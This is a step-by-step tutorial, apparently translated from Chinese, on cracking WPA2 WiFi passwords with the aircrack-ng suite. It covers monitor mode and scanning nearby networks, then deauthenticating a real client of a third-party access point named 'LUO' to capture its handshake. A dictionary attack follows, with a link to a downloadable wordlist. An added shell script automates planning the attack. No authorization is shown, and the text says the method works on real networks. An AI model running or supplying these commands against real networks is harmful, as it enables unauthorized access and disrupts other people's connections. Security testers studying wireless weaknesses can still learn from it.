Preface:
Aircrack-ng is one of the mainstream tools for cracking WEP/WPA/WPA2 encryption. wifite was covered earlier; the aircrack-ng suite contains tools for capturing packets, capturing and verifying handshakes, and running brute-force and dictionary attacks.
Cracking a wireless password successfully depends on the following: first, capturing the handshake into a .cap file; second, a strong WiFi password dictionary, since whether the dictionary contains the passphrase is what decides the success rate (dictionary download: https://yunpan.cn/cSAgLSBhScEJg, access code 4b05); and finally a fast machine to run the dictionary through.
– Aircrack-ng: wireless password cracking
– Aireplay-ng: traffic generation, client deauthentication and fake authentication
– Airodump-ng: packet capture
– Airbase-ng: rogue (fake) access point setup
1. Find the wireless interface name
# ifconfig
wlan0
2. Switch the wireless card into monitor mode (not promiscuous mode: monitor mode lets the card receive raw 802.11 frames, including beacons and handshakes, from networks it has not joined)
If airmon-ng reports errors while switching, kill the interfering processes it lists (airmon-ng check kill) and retry; some external cards do not support monitor mode.
(Tested with 360wifi, Baidu wifi and Tencent wifi; a Mercury MW150US was tested and confirmed to support it.)
# airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 rtl8723be Realtek Semiconductor Co., Ltd. RTL8723BE PCIe Wireless Network Adapter
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
phy1 wlan1 rtl8192cu Realtek Semiconductor Corp. RTL8188CUS 802.11n WLAN Adapter
3. Check that monitor mode is enabled; on success the interface is renamed wlan0mon (iwconfig wlan0mon should report Mode:Monitor)
# ifconfig
wlan0mon
4. Scan for WiFi networks
# airodump-ng wlan0mon
CH 5 ][ Elapsed: 18 s ][ 2016-05-13 23:42
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
30:FC:68:73:61:74 -73 4 0 0 1 54e. WPA2 CCMP PSK ssssssssssssss
40:16:9F:5A:1E:0A -1 0 0 0 7 -1 <length: 0>
00:25:86:4B:7A:52 -54 50 0 0 6 54e. WPA2 CCMP PSK oxya2809
EC:26:CA:EB:5C:12 -52 54 0 0 11 54e. WPA2 CCMP PSK TP-LINK_FFC0
CC:34:29:2D:A1:F6 -49 56 1 0 6 54e. WPA2 CCMP PSK a405
6C:59:40:90:50:C4 -63 62 64 0 6 54e. WPA2 CCMP PSK LUO
14:75:90:EF:B4:68 -65 32 1 0 6 54e. WPA2 CCMP PSK Chen
8C:F2:28:AA:CE:22 -64 44 0 0 1 54e. WPA2 CCMP PSK CMCC-EDU
30:FC:68:1E:FF:C0 -68 38 0 0 1 54e. WPA2 CCMP PSK TP-LINK_FFC0
D0:0F:6D:30:A5:3B -69 33 0 0 12 54e WPA2 CCMP PSK ChinaNet-NRvE
5C:63:BF:5D:FA:36 -66 24 0 0 6 54e. WPA2 CCMP PSK a406
00:0A:EB:40:20:2C -70 12 0 0 1 54e WPA CCMP PSK Topwa
3C:46:D8:0B:8E:95 -70 22 0 0 1 54e. WPA2 CCMP PSK PSQ
8C:F2:28:A9:DE:EE -71 11 0 0 11 54e. WPA2 CCMP PSK A404
FC:D7:33:37:BF:DE -72 9 0 0 1 54e. WPA2 CCMP PSK yujianxiang603
D0:FA:1D:62:7A:80 -73 7 0 0 1 54e WPA2 CCMP PSK ChenLeWangZhou
5. Lock onto the target AP
# airodump-ng -w LUO -c 6 --bssid 6C:59:40:90:50:C4 wlan0mon
-w LUO: the output file prefix; captures are written to LUO-01.cap, LUO-02.cap, ... (this is not the WiFi name, although naming the file after the target is convenient)
-c 6: the channel number, taken from the CH column of the scan (LUO is on channel 6; locking the wrong channel means the handshake is never seen)
--bssid: the MAC address of the router broadcasting the target ESSID
wlan0mon: the interface in monitor mode
CH 6 ][ Elapsed: 3 mins ][ 2016-05-13 23:58 ][ WPA handshake: 6C:59:40:90:50:
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E
6C:59:40:90:50:C4 -57 0 1180 483 1 6 54e. WPA2 CCMP PSK L
BSSID STATION PWR Rate Lost Frames Probe
6C:59:40:90:50:C4 AC:F7:F3:5E:A5:93 -1 1e- 0 0 441
6C:59:40:90:50:C4 D0:A6:37:AD:90:C7 -61 1e-24 2 6526
6C:59:40:90:50:C4 B4:30:52:A0:66:EA -1 1e- 0 0 1
6C:59:40:90:50:C4 BC:44:86:60:F1:4C -1 1e- 0 0 1
6. Open a second terminal (the terminal from step 5 must stay open, otherwise the handshake will not be captured). Spoofing the router, send deauthentication frames to one of its connected clients; the #Data count in step 5 keeps rising, and when the client drops and reconnects, the 4-way handshake is captured.
# aireplay-ng -0 10 -a 6C:59:40:90:50:C4 -c D0:A6:37:AD:90:C7 wlan0mon
-0 10: deauthentication attack, 10 rounds (0 means keep sending until interrupted)
-a 6C:59:40:90:50:C4: the BSSID, i.e. the router's MAC address
-c D0:A6:37:AD:90:C7: the STATION, i.e. the client's MAC address (pick one from the station list in step 5; omit -c to deauthenticate every client by broadcast)
23:56:21 Waiting for beacon frame (BSSID: 6C:59:40:90:50:C4) on channel 6
23:56:21 Sending 64 directed DeAuth. STMAC: [D0:A6:37:AD:90:C7] [ 0|65 ACKs]
23:56:22 Sending 64 directed DeAuth. STMAC: [D0:A6:37:AD:90:C7] [ 0|53 ACKs]
23:56:23 Sending 64 directed DeAuth. STMAC: [D0:A6:37:AD:90:C7] [ 0|68 ACKs]
23:56:23 Sending 64 directed DeAuth. STMAC: [D0:A6:37:AD:90:C7] [ 0|42 ACKs]
23:56:24 Sending 64 directed DeAuth. STMAC: [D0:A6:37:AD:90:C7] [ 0|80 ACKs]
23:56:24 Sending 64 directed DeAuth. STMAC: [D0:A6:37:AD:90:C7] [ 0|61 ACKs]
23:56:25 Sending 64 directed DeAuth. STMAC: [D0:A6:37:AD:90:C7] [ 0|55 ACKs]
23:56:26 Sending 64 directed DeAuth. STMAC: [D0:A6:37:AD:90:C7] [ 0|69 ACKs]
23:56:26 Sending 64 directed DeAuth. STMAC: [D0:A6:37:AD:90:C7] [ 0|42 ACKs]
23:56:27 Sending 64 directed ^CAuth. STMAC: [D0:A6:37:AD:90:C7] [ 0|34 ACKs]
7. Crack the handshake
# aircrack-ng -w password.txt LUO-0*.cap
-w password.txt: the password dictionary
LUO-0*.cap: the capture files written in step 5 (LUO-01.cap, LUO-02.cap, ...); add -b 6C:59:40:90:50:C4 if the capture contains more than one network so aircrack-ng does not prompt for a choice
Opening LUO-01.cap
Read 548 packets.
No networks found, exiting.
Quitting aircrack-ng…
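The seven steps above wrapped in a dry-run shell script, as an added example that is not part of the original article or of the aircrack-ng project. It assumes the step-4 scan has been saved as text (a constructed subset of the scan is embedded), that the monitor interface is wlan0mon and the wordlist is password.txt; the function names (ap_lookup, plan_attack and the rest) are my own. What it adds to the walkthrough is that the channel passed to airodump-ng is looked up from the scan instead of being typed by hand, and that a capture is only worth handing to aircrack-ng once airodump-ng's status line shows the WPA handshake marker.

```shell
#!/usr/bin/env bash
# Added example (not from the original article): the seven steps as shell
# functions. Channel and BSSID are read from saved airodump-ng scan output,
# because a wrong -c value silently prevents the handshake from ever being
# captured. Commands are printed, not executed (dry run).
set -eu

# Constructed sample: a subset of the step-4 scan, as airodump-ng prints it.
SCAN_SAMPLE=' BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 30:FC:68:73:61:74  -73        4        0    0   1  54e. WPA2 CCMP   PSK  ssssssssssssss
 40:16:9F:5A:1E:0A   -1        0        0    0   7  -1                    <length:  0>
 6C:59:40:90:50:C4  -63       62       64    0   6  54e. WPA2 CCMP   PSK  LUO
 14:75:90:EF:B4:68  -65       32        1    0   6  54e. WPA2 CCMP   PSK  Chen'

# ap_lookup ESSID: print "BSSID CH" for the first AP whose ESSID matches,
# return 1 if it is not in the scan. Data rows start with a 17-char MAC, the
# channel is the 6th column and the ESSID the last one (ESSIDs containing
# spaces would need a different parser).
ap_lookup() {
  printf '%s\n' "$SCAN_SAMPLE" | awk -v want="$1" '
    length($1) == 17 && $1 ~ /^[0-9A-F:]*$/ && $NF == want {
      print $1, $6; found = 1; exit
    }
    END { if (!found) exit 1 }'
}

# Step 5: capture on the target channel, filtered to its BSSID, into PREFIX-01.cap.
capture_cmd() {
  local prefix=$1 bssid=$2 ch=$3 iface=$4
  printf 'airodump-ng -w %s -c %s --bssid %s %s\n' "$prefix" "$ch" "$bssid" "$iface"
}

# Step 6: deauthenticate one client so it reconnects and re-runs the 4-way
# handshake. ROUNDS=0 would mean "until interrupted".
deauth_cmd() {
  local bssid=$1 station=$2 iface=$3 rounds=${4:-10}
  printf 'aireplay-ng -0 %s -a %s -c %s %s\n' "$rounds" "$bssid" "$station" "$iface"
}

# Step 7: run the dictionary against every capture file with this prefix;
# -b pins the BSSID so aircrack-ng does not prompt when the .cap holds
# several networks.
crack_cmd() {
  local wordlist=$1 bssid=$2 prefix=$3
  printf 'aircrack-ng -w %s -b %s %s-0*.cap\n' "$wordlist" "$bssid" "$prefix"
}

# handshake_seen BSSID < saved-airodump-screen: airodump-ng puts
# "WPA handshake: <BSSID>" in its status line once the handshake is in the
# capture; without that marker step 7 has nothing to crack.
handshake_seen() {
  grep -q "WPA handshake: $1"
}

# plan_attack ESSID STATION [IFACE] [WORDLIST]: print the commands for steps
# 5 to 7 with channel and BSSID derived from the scan rather than typed.
plan_attack() {
  local essid=$1 station=$2 iface=${3:-wlan0mon} wordlist=${4:-password.txt}
  local ap bssid ch
  ap=$(ap_lookup "$essid") || { echo "ESSID '$essid' not found in scan" >&2; return 1; }
  bssid=${ap% *}
  ch=${ap#* }
  capture_cmd "$essid" "$bssid" "$ch" "$iface"
  deauth_cmd "$bssid" "$station" "$iface"
  crack_cmd "$wordlist" "$bssid" "$essid"
}

# Dry run for the article's target: AP LUO, client D0:A6:37:AD:90:C7.
plan_attack LUO D0:A6:37:AD:90:C7
```

Run it as-is to print the three commands for the article's target; paste the first two into the two terminals of steps 5 and 6, and only run the third once the step-5 status line carries the handshake marker (running `aircrack-ng LUO-01.cap` with no wordlist also lists each network in the capture together with how many handshakes it holds).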
This article is for study and testing; no handshake was actually captured here. Whether the crack succeeds comes down to a strong dictionary and luck; the method above applies to WiFi cracking in real environments.
PDF version of the above for download: Kali下无线密码破解工具Aircrack-ng详解.pdf